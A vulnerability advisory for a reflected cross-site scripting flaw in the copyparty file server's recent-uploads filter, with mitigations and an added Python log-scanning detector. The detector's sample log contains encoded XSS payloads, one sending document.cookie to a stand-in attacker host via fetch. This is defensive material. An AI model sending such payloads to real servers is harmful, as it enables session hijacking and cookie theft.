CVE-2025-54589: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in 9001 copyparty
Copyparty is a portable file server. In versions 1.18.6 and below, when accessing the recent uploads page at `/?ru`, users can filter the results using an input field at the top. This field appends a filter parameter to the URL, which reflects its value directly into a `<script>` block without proper escaping, allowing for reflected Cross-Site Scripting (XSS) and can be exploited against both authenticated and unauthenticated users. This is fixed in version 1.18.7.
AI Analysis
Technical Summary
CVE-2025-54589 is a reflected Cross-Site Scripting (XSS) vulnerability in the copyparty portable file server, versions 1.18.6 and below. It sits on the recent uploads page, reached at `/?ru`, where users can filter the displayed results through an input field at the top of the page. The field appends a filter parameter to the URL, and the server reflects that parameter's value into an inline `<script>` block without escaping it. Because the value lands inside JavaScript source rather than HTML text, a value containing a quote can terminate the string literal and continue as attacker-controlled JavaScript, and a value containing `</script>` can close the block outright and open a new one; HTML-entity encoding alone does not protect this context, the value has to be emitted as a JavaScript string literal with `<`, `>` and `&` written as `\uXXXX` escapes. Any injected script runs in the victim's browser with the origin of the copyparty server, so it can read or act on whatever the victim's session can reach. Both authenticated and unauthenticated users can be targeted, though the payoff is greater against an authenticated victim, since the script then acts with that user's permissions on the file server. Typical consequences of reflected XSS are session theft (where cookies are not HttpOnly), actions performed as the victim, page defacement and redirection to attacker-controlled sites. The CVSS v3.1 base score is 6.3 (medium): network attack vector, low attack complexity, no privileges required, user interaction required (the victim must open a crafted link), and low impacts on confidentiality, integrity and availability. The issue was fixed in copyparty 1.18.7 by properly escaping the filter parameter before embedding it in the script block. No exploitation in the wild was known at publication time and the advisory provides no direct patch link; upgrading to 1.18.7 or later is the recommended fix.
Potential Impact
For organizations using copyparty as a portable file server, this vulnerability is a moderate risk. Exploitation lets an attacker run arbitrary script in a victim's browser in the context of the copyparty origin, which can translate into session hijacking, unauthorized reading of shared files or, if the victim's account has write permissions, unauthorized uploads or deletions. Since copyparty is typically used for file sharing and collaboration, an attacker could use such a compromise to take over user accounts or plant malicious files for other users to download. Because unauthenticated users can also be targeted, any publicly reachable instance exposes the recent uploads page to anyone who can lure a user to a crafted link, which widens the attack surface compared with a login-gated page. Confidentiality of shared files and user credentials can be compromised and data integrity undermined through actions performed in the victim's session; the availability impact is limited and, like the other two, is rated low in the CVSS score. European organizations relying on copyparty for internal or external file sharing should treat this as a significant concern, particularly in sectors handling sensitive or regulated data such as finance, healthcare or government.
Mitigation Recommendations
1. Upgrade copyparty to version 1.18.7 or later as soon as possible; this is the only complete fix, since it changes how the filter parameter is written into the page.
2. If an immediate upgrade is not feasible, add WAF or reverse-proxy rules that block requests to `/?ru` whose query parameters contain `<`, `>`, quotes or backslashes after percent-decoding. Treat this as a stopgap: the parameter is reflected into JavaScript, so a rule that looks only for `<script` misses the quote-based breakout, and a rule that does not decode the query string misses encoded payloads.
3. Anyone running a fork or custom templates should apply context-appropriate output encoding to every user-supplied value written into a `<script>` block (emit it as a JSON/JavaScript string literal with `<`, `>` and `&` as `\u` escapes); HTML-entity encoding does not protect that context.
4. Restrict access to the copyparty server to trusted networks or a VPN to reduce exposure to unauthenticated attackers.
5. Educate users about the risks of opening links to the file server that carry unexpected URL parameters.
6. Monitor access logs (copyparty's own or those of a reverse proxy in front of it) for requests to the recent uploads page whose query parameters contain script-like content; such requests indicate attempted exploitation and identify the source address.
7. Regularly audit and update all third-party software components so that known vulnerabilities are patched promptly.
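As an added example for recommendations 2 and 6 (not part of the original advisory or of copyparty), the detection below runs over constructed access-log lines in the common log format a reverse proxy in front of copyparty would write. It percent-decodes every parameter of requests to `/` that carry the `ru` key and flags values containing characters needed to break out of a JavaScript string or a `<script>` block. The parameter name `filt` in the sample lines is a placeholder, since the page does not name the real parameter; the IP addresses are from documentation ranges and the lines are made up.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not copyparty code. Constructed log lines in common log format
# (what nginx/Apache/Caddy would write in front of copyparty); adapt LINE_RE to
# your proxy's format. "filt" is a placeholder parameter name; every parameter
# on a recent-uploads request is inspected, so the real name does not matter.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Jul/2025:14:02:46 +0000] "GET /?ru HTTP/1.1" 200 5120
203.0.113.7 - - [31/Jul/2025:14:02:51 +0000] "GET /?ru&filt=report HTTP/1.1" 200 4870
198.51.100.23 - - [31/Jul/2025:14:03:10 +0000] "GET /?ru&filt=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 4899
198.51.100.23 - - [31/Jul/2025:14:03:12 +0000] "GET /?ru&filt=%22%3Bfetch(%27//evil.example/%3F%27%2Bdocument.cookie)%3B%2F%2F HTTP/1.1" 200 4901
192.0.2.5 - - [31/Jul/2025:14:04:00 +0000] "GET /docs/?k=%3Cb%3E HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Characters and tokens a plain-text filter value has no use for but which are
# needed to break out of a JS string literal or a <script> block.
SUSPICIOUS_RE = re.compile(r"""[<>"'\\]|javascript:|\bon\w+\s*=""", re.I)


def find_suspicious(log_text: str) -> list:
    """Return one dict per suspicious parameter value on a /?ru request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != "/":
            continue            # recent uploads page lives at the root
        # keep_blank_values keeps the valueless "ru" key; parse_qs also
        # percent-decodes, which any WAF rule for this must do as well.
        params = parse_qs(parts.query, keep_blank_values=True)
        if "ru" not in params:
            continue
        for name, values in params.items():
            for value in values:
                if SUSPICIOUS_RE.search(value):
                    hits.append({"ip": m["ip"], "ts": m["ts"],
                                 "param": name, "value": value})
    return hits


def summarize_by_ip(hits: list) -> dict:
    """Count flagged requests per source address, for blocking or follow-up."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_suspicious(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} param={h["param"]!r} value={h["value"]!r}')
    print(summarize_by_ip(found))
```

The decoding step is the important part: the second flagged line carries no `<` at all, only a `"` followed by JavaScript, so a rule keyed on `<script` would let it through, and both payloads are percent-encoded on the wire. The same logic does not catch double-encoded input or a parameter delivered in a POST body, so treat it as triage for log review, not as a substitute for the upgrade.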
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland
Technical Details
- Data Version: 5.1
- Assigner Short Name: GitHub_M
- Date Reserved: 2025-07-25T16:19:16.094Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 688b7786ad5a09ad00b8a643
Added to database: 7/31/2025, 2:02:46 PM
Last enriched: 7/31/2025, 2:17:44 PM
Last updated: 8/1/2025, 1:36:08 PM